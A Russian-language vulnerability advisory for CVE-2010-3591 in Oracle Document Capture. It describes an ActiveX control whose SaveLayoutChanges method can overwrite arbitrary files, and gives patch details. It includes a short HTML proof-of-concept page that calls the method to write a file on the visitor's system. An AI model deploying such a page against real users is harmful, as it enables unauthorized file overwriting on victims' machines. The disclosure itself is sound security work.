CVE-2010-3591

Вендор

Oracle

Продукт

Oracle Document Capture Release 10gR3 

Тип уязвимости

Небезопасный метод

Reported

23.03.2010

Date of Public Advisory

25.01.2011

Автор

Дмитрий Евдокимов

Детальное описание

Oracle Document Capture содержит компонент ActiveX ActiveBar2Library (Actbar2.ocx) Lib GUID: {4932CEF1-2CAA-11D2-A165-0060081C43D9}, который содержит небезопасный метод "SaveLayoutChanges", способный переписать любой нескрытый файл в системе.

Class ActiveBar2 
GUID: {4932CEF4-2CAA-11D2-A165-0060081C43D9} 
Number of Interfaces: 1 
Default Interface: IActiveBar2 
RegKey Safe for Script: True 
RegKey Safe for Init: True 
KillBitSet: False 

Эксплойт
***********
Злоумышленник может создать HTML-страницу, которая вызовет уязвимую функцию "SaveLayoutChanges" из компонента ActiveX Actbar2.ocx

Пример
*********
<HTML> 
<HEAD> 
<TITLE>DSecRG</TITLE> 
</HEAD> 
<BODY> 

<OBJECT id='eds' classid='clsid:4932CEF4-2CAA-11D2-A165-0060081C43D9'></OBJECT> 

<SCRIPT> 

function Exploit(){ 
eds.SaveLayoutChanges("C:\\31337.txt",1); 
} 
Exploit(); 

</SCRIPT> 
</BODY> 
</HTML> 

Решение
**********
Информация была опубликована в CPU, Январь 2011.
Клиенты могут загрузить патчи CPU, следуя инструкциям по ссылке:
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html